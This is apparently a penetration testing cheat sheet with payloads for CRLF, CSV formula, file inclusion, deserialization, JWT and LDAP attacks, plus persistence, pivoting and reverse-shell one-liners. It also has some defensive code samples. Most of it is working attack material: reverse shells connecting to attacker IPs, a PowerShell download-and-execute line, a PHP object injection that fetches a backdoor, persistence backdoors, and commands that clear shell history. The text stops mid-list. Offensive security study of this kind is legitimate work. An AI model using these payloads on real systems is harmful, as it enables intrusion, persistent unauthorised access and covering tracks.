Penetration Testing Notes
I recently came across a very good repository and, since I had some time, went through all of it and wrote up these notes.
1. CRLF injection
CRLF - add a cookie
http://www.example.com/%0D%0ASet-Cookie:mycookie=myvalue
CRLF - bypass XSS protection (the injected headers switch X-XSS-Protection off and the chunked body carries the payload)
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
CRLF - phishing (end the real response with Content-Length: 0 and append a second, attacker-written response)
http://www.example.com/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
CRLF - filter bypass
If %0D/%0A are rejected, send the UTF-8 encoding of the CJK characters U+560A/U+560D/U+563E/U+563C; a server that keeps only the low byte of each decoded character turns them into LF, CR, > and <:
%E5%98%8A => %0A => \u560a
%E5%98%8D => %0D => \u560d
%E5%98%BE => %3E => \u563e (>)
%E5%98%BC => %3C => \u563c (<)
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
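To see what the injection above actually does to a response, here is an added example (not code from the original notes): a minimal redirect handler that copies a user-controlled `lang` parameter into its Location header, the same handler with the CR/LF check a fixed version needs, and a `truncate_wide` switch that emulates the low-byte truncation the %E5%98%8A trick relies on. The handler, the header names and the truncation behaviour are assumptions made for the demonstration.

```python
"""CRLF/header injection in a redirect handler: vulnerable build vs. strict build.
Added example, not code from the original notes; the handler and the
truncate_wide behaviour are assumptions made for the demonstration."""
from urllib.parse import unquote


def _decode(value: str, truncate_wide: bool) -> str:
    """Percent-decode like the server would. With truncate_wide=True the server keeps only
    the low byte of each decoded code point: U+560A becomes 0x0A (LF), U+560D becomes 0x0D (CR)."""
    decoded = unquote(value)
    if truncate_wide:
        decoded = "".join(chr(ord(c) & 0xFF) for c in decoded)
    return decoded


def build_redirect(lang: str, strict: bool = False, truncate_wide: bool = False) -> bytes:
    """Raw 302 response whose Location header embeds the user-controlled `lang` value.
    strict=False is the vulnerable pattern; strict=True rejects CR/LF *after* decoding."""
    value = _decode(lang, truncate_wide)
    if strict and ("\r" in value or "\n" in value):
        raise ValueError("CR/LF in header value")
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: /index.php?lang={value}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("utf-8")


def parse_headers(raw: bytes) -> dict:
    """Header block as a lenient client sees it: LF-terminated lines after the status line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("utf-8")
    headers = {}
    for line in head.split("\n")[1:]:
        line = line.strip("\r")
        if not line:
            continue
        name, _, val = line.partition(":")
        headers[name.strip()] = val.strip()
    return headers


def injected_headers(lang: str, strict: bool = False, truncate_wide: bool = False) -> set:
    """Names of headers the client receives that the handler never meant to send."""
    try:
        headers = parse_headers(build_redirect(lang, strict, truncate_wide))
    except ValueError:
        return set()
    return set(headers) - {"Location", "Content-Length"}
```

The strict check has to run on the decoded value: filtering the literal strings "%0D" and "%0A" in the raw query string is exactly what the UTF-8 low-byte trick walks around.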
2. CSV / Excel formula injection
Any cell that starts with '=', '+', '-' or '@' is interpreted as a formula by spreadsheet software.
Dynamic Data Exchange (DDE): =DDE(server; file; item; mode)
Exploit:
=DDE("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
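The export side is where this gets fixed. The following is an added example (not from the original notes) of the check an exporter should apply: it flags every cell a spreadsheet would evaluate, including the leading-whitespace and tab/CR/LF variants, prefixes it with an apostrophe to force text mode, and lets the csv writer double embedded quotes so the file stays well-formed. The sample rows are constructed.

```python
"""CSV export hardening against formula injection: flag cells a spreadsheet would evaluate
and neutralise them. Added example, not from the original notes; the rows are constructed."""
import csv
import io

FORMULA_STARTS = ("=", "+", "-", "@")
CONTROL_STARTS = ("\t", "\r", "\n")


def is_formula(value) -> bool:
    """True for anything Excel/LibreOffice would treat as a formula, including after leading spaces."""
    text = str(value)
    return text.startswith(CONTROL_STARTS) or text.lstrip().startswith(FORMULA_STARTS)


def escape_cell(value) -> str:
    """A leading apostrophe forces text mode; the csv writer doubles any embedded quotes."""
    text = str(value)
    return "'" + text if is_formula(text) else text


def export_csv(rows) -> str:
    """Write rows with every cell quoted and every formula-looking cell neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([escape_cell(cell) for cell in row])
    return buf.getvalue()
```

Negative numbers trip the same check, so genuinely numeric columns should be exported as numbers rather than passed through `escape_cell` as strings.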
3. File inclusion
Linux
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/PID/fd/<file descriptor>
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
Windows
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/system volume information/wpsettings.dat
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
Logs
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
Basic syntax
http://example.com/index.php?page=../../../etc/passwd
Null-byte truncation (PHP older than 5.3.4 only)
http://example.com/index.php?page=../../../etc/passwd%00
Double encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
Directory traversal
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[...]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
Filter bypass (a filter that strips "../" once collapses "....//" back into "../"):
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Stream wrappers
php://filter
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=index.php
Large files (compress before encoding):
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
zip://
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg;
http://example.com/index.php?page=zip://shell.jpg%23payload.php
data:// (needs allow_url_include=On)
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
base64 content: "<?php system($_GET['cmd']);?>"
Bypassing XSS filters:
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
base64 content: <svg onload=alert(1)>
expect:// (needs the expect extension)
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
php://input
http://example.com/index.php?page=php://input
POST body: <?php system('id'); ?>
phar://
The metadata of a phar archive is unserialized as soon as a filesystem function touches a phar:// path, so a phar file doubles as a deserialization payload. Two scripts: the first builds the archive (phar.readonly must be 0), the second shows the trigger.
// create.php (run with: php -d phar.readonly=0 create.php)
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
// attach metadata: a serialized object of any class
class AnyClass {}
$object = new AnyClass;
$object->data = 'phar';
$phar->setMetadata($object);
$phar->stopBuffering();

// trigger.php: the same class name, now with a destructor, is unserialized from the metadata
class AnyClass {
    function __destruct() {
        echo $this->data;
    }
}
include('phar://test.phar'); // output: phar
Remote command execution through inclusion
/proc/*/fd
1. Upload some shell files (100+).
2. Include them through the descriptor: http://example.com/index.php?page=/proc/$PID/fd/$FD
$PID: process id (brute-forceable)
$FD: file descriptor (brute-forceable)
/proc/self/environ
As with log files, a payload sent in the User-Agent ends up in /proc/self/environ (as HTTP_USER_AGENT):
GET index.php?page=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
File upload
Upload a file of any format containing the malicious code, e.g. <?php system($_GET['c']);?>, then include it:
http://example.com/index.php?page=path/to/upload/file.png
Race condition
1. Upload a file and trigger a self-include.
2. Upload repeatedly to raise the odds of winning the race and of the brute force hitting.
3. Brute-force the temporary upload name: /tmp/php[0-9a-zA-Z]{6}
# bruteforce_upload_race.py
import itertools
import string
import sys
import requests

print('[+] Upload Trying...')
for _ in range(4096 * 4096):
    # reopen for every request: a file object is exhausted after the first post
    with open('shell.php', 'rb') as f:
        requests.post('http://target.com/index.php?c=index.php', files={'file': f})

print('[+] Bruteforcing...')
# PHP names temporary uploads /tmp/phpXXXXXX; product() allows repeated characters, combinations() would not
for chars in itertools.product(string.ascii_letters + string.digits, repeat=6):
    url = 'http://target.com/index.php?c=/tmp/php' + ''.join(chars)
    r = requests.get(url)
    if 'load average' in r.text:  # shell.php contains <?php echo system('uptime');
        print('[+] We have got a shell: ' + url)
        sys.exit(0)
print('[x] Something went wrong, please try again')
phpinfo
phpinfo() prints the tmp_name of an in-flight upload, which removes the guessing step:
https://www.insomniasec.com/downloads/publications/phpinfolfi.py
4. Insecure deserialization
Java
Exploit: https://github.com/frohoff/ysoserial
java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64
Burp Suite extensions: JavaSerialKiller, Java Deserialization Scanner, Burp-ysoserial, SuperSerial, SuperSerial-Active
PHP
<?php
// attacker side: open a listener for the callback
system('gnome-terminal -x sh -c \'nc -lvvp 2333\'');
// the class name must match one the target defines, whose magic method (__wakeup/__destruct) uses $inject
class PHPObjectInjection {
    public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r=';
$url = $url . urlencode(serialize(new PHPObjectInjection));
print "[+] Sending exploit...\r\n";
$response = file_get_contents("$url");
?>
Python
import os
import cPickle  # Python 2; on Python 3 use pickle
from base64 import b64encode, b64decode

class Evil(object):
    def __reduce__(self):
        # whatever unpickles this token runs os.system("whoami")
        return (os.system, ("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}".format(evil_token))
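The `__reduce__` gadget above is the whole attack; what is worth seeing next to it is how the receiving side is fixed. The following is an added example (not from the original notes) that builds the same kind of gadget, shows that plain `pickle.loads` executes it, and runs it through a restricted `Unpickler` whose `find_class` only resolves an allow-list of globals. `os.getcwd` stands in for `os.system` so the demo has no side effects; the allow-list contents are an assumption.

```python
"""Pickle deserialization: the __reduce__ gadget next to a restricted loader that refuses it.
Added example, not from the original notes; os.getcwd stands in for os.system so the demo
has no side effects, and the ALLOWED set is an assumption."""
import io
import os
import pickle


class Gadget:
    """pickle.loads(pickle.dumps(Gadget(f, args))) calls f(*args) on the victim."""

    def __init__(self, func, args):
        self.func, self.args = func, args

    def __reduce__(self):
        return (self.func, self.args)


def build_payload() -> bytes:
    # the exploit on the page uses os.system("whoami"); getcwd exercises the same call path harmlessly
    return pickle.dumps(Gadget(os.getcwd, ()))


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list of globals the application actually needs; every other global is refused."""

    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def roundtrip(obj):
    """Benign data (dicts, lists, sets) still loads through the restricted loader."""
    return safe_loads(pickle.dumps(obj))


def demo() -> tuple:
    """Return (gadget executed under pickle.loads, gadget refused by safe_loads)."""
    payload = build_payload()
    executed = pickle.loads(payload) == os.getcwd()
    try:
        safe_loads(payload)
        refused = False
    except pickle.UnpicklingError:
        refused = True
    return executed, refused
```

A restricted unpickler is a containment measure, not a replacement for signing the token (HMAC over the bytes, verified before unpickling) or for switching to JSON.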
Ruby
for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
5. JWT (JSON Web Token)
Format: Base64url(Header).Base64url(Data).Base64url(Signature)
Example:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY
Online encoder/decoder: https://www.jsonwebtoken.io/
JWT tools:
jwt_tool
git clone https://github.com/ticarpi/jwt_tool
> python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw result.txt
c-jwt-cracker
git clone https://github.com/brendan-rius/c-jwt-cracker
> ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
> Secret is "Sn1f"
Hashcat
hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
(hash.txt holds the token; a cracked result is printed as eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret)
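What the crackers above do is cheap to reproduce with the standard library, and doing so shows the two server-side mistakes they depend on. The following is an added example (not from the original notes or from any of the tools listed): it signs and verifies HS256 tokens, recovers a weak secret from a wordlist the way jwt_tool, c-jwt-cracker and hashcat mode 16500 do, and forges an `alg: none` token to show why a verifier must pin the algorithm instead of reading it from the header. The secret and claims are constructed for the demonstration.

```python
"""HS256 JWTs with the standard library only: sign, verify, dictionary-attack the secret,
and show that an 'alg: none' forgery is refused. Added example, not from the original notes;
the secret and the claims are constructed for the demonstration."""
import base64
import hashlib
import hmac
import json
from typing import Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, secret: str) -> str:
    header, body = _segment({"alg": "HS256", "typ": "JWT"}), _segment(claims)
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify_hs256(token: str, secret: str) -> dict:
    """Pin the algorithm server-side instead of trusting the header; compare MACs in constant time."""
    header, body, sig = token.split(".")
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body))


def crack_hs256(token: str, wordlist) -> Optional[str]:
    """Recompute the MAC per candidate secret; this is all jwt_tool / c-jwt-cracker / hashcat -m 16500 do."""
    header, body, sig = token.split(".")
    message, target = f"{header}.{body}".encode(), b64url_decode(sig)
    for guess in wordlist:
        if hmac.compare_digest(hmac.new(guess.encode(), message, hashlib.sha256).digest(), target):
            return guess
    return None


def forge_none(claims: dict) -> str:
    """Unsigned token that a verifier honouring the header's alg field would accept."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def accepts(token: str, secret: str) -> bool:
    try:
        verify_hs256(token, secret)
        return True
    except ValueError:
        return False
```

The dictionary attack is offline and unthrottled, so an HS256 secret has to be a random key of at least 256 bits; a six-character mask (`?a?a?a?a?a?a`) is well within hashcat's reach.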
6. LDAP injection
Example 1:
user = *)(uid=*))(|(uid=*
pass = password
query = "(&(uid=*)(uid=*))(|(uid=*)(userPassword=MD5(password)))"
Example 2:
user = admin)(!(&(1=0
pass = q))
query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
Attack payloads:
*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
Default attributes (use as *)(ATTRIBUTE_HERE=*):
userPassword
surname
name
cn
sn
objectClass
mail
givenName
commonName
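Example 1 works because the user value closes the `(uid=...)` clause and opens a second top-level filter; many servers evaluate only the first one and the password clause is never consulted. The following is an added example (not from the original notes) that builds the login filter both ways and escapes the filter metacharacters as RFC 4515 requires. The login filter shape is an assumption.

```python
"""LDAP filter construction with and without RFC 4515 escaping. Added example, not from the
original notes; the (&(uid=...)(userPassword=...)) login filter shape is an assumption."""


def escape_filter_value(value: str) -> str:
    """Escape the characters that have meaning inside a search filter as \\XX (RFC 4515 section 3)."""
    return "".join(f"\\{ord(ch):02x}" if ch in "\\*()\x00" else ch for ch in value)


def build_login_filter(user: str, password: str, escape: bool = True) -> str:
    """escape=False is the vulnerable concatenation; escape=True is the fix."""
    if escape:
        user, password = escape_filter_value(user), escape_filter_value(password)
    return f"(&(uid={user})(userPassword={password}))"


def top_level_filters(flt: str) -> int:
    """Count top-level parenthesised groups. A well-formed filter has exactly one; an
    injected one has more, and servers typically evaluate only the first."""
    depth, groups = 0, 0
    for ch in flt:
        if ch == "(":
            if depth == 0:
                groups += 1
            depth += 1
        elif ch == ")":
            depth -= 1
    return groups
```

Escaping restores the structure, but binding as the user (an LDAP bind with the supplied password) rather than comparing `userPassword` in a filter is the stronger fix, since a filter comparison leaks whether the attribute is readable at all.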
7. Linux persistence
Basic listeners
ncat --udp -lvp 2333
ncat --tcp -lvp 2333
ncat --sctp -lvp 2333
SUID
TMPDIR="/var/tmp"
printf '#define _GNU_SOURCE\n#include <unistd.h>\n#include <stdlib.h>\nint main(void){setresuid(0, 0, 0);system("/bin/sh");return 0;}\n' > $TMPDIR/suidshell.c
gcc $TMPDIR/suidshell.c -o $TMPDIR/suidshell 2>/dev/null
chown root:root $TMPDIR/suidshell
chmod 4777 $TMPDIR/suidshell
Crontab
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
Startup service
RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i $RSHELL" /etc/network/if-up.d/upstart
Startup file
On Linux, write a file at ~/.config/autostart/NAME_OF_FILE.desktop; every ~/.config/autostart/*.desktop is started at login. Point Exec at the payload and keep X-GNOME-Autostart-enabled=true:
[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=true
Driver (udev rule, fires when a USB device is plugged in)
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null
Tips
1. Hide the payload with ANSI escape characters.
2. Clear the command history:
export HISTSIZE=0
export HISTFILESIZE=0
unset HISTFILE; CTRL-D
or kill -9 $$
or echo "" > ~/.bash_history
or rm ~/.bash_history -rf
or history -c
or ln /dev/null ~/.bash_history -sf
3. These temporary directories are usually writable:
/var/tmp/
/tmp/
/dev/shm/
8. Windows persistence
Registry
Create a REG_SZ value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run:
name: Backdoor
value: C:\Users\test\AppData\Local\Temp\backdoor.exe
Same for HKLM\Software\Microsoft\Windows\CurrentVersion\Run (runs for every user, needs admin rights):
name: Backdoor
value: C:\Windows\Temp\backdoor.exe
Startup folder
Create a batch script in the user's Startup folder:
PS C:\> gc "C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat"
start /b C:\Users\test\AppData\Local\Temp\backdoor.exe
Scheduled task
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
Service
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
9. Pivoting / port forwarding
Windows netsh
netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
1. listenaddress: local IP address to listen on
2. listenport: local port to listen on
3. connectaddress: remote IP address the connection is redirected to
4. connectport: port that connections to listenport are forwarded to
SSH
SOCKS proxy
ssh -N -f -D 9000 [user]@[host]
-f: run ssh in the background
-N: do not execute a remote command
Local port forwarding
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
Remote port forwarding
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
Proxychains
1. Config file: /etc/proxychains.conf
[ProxyList]
socks4 localhost 8080
2. proxychains nmap -sT 192.168.5.6
Web SOCKS - reGeorg
https://github.com/sensepost/reGeorg
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
Metasploit
portfwd list
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
or
run autoroute -s 192.168.57.0/24
use auxiliary/server/socks4a
10. Reverse shells
Bash TCP
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
Bash UDP
Victim: sh -i >& /dev/udp/127.0.0.1/4242 0>&1
Attacker: nc -u -lvp 4242
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
NOTE: Windows only
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
Linux
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Windows
python -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
nc
ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash
PowerShell
1. powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2= $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
2. powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
3. powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
Awk
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Java (Groovy syntax)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
NodeJS
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
or
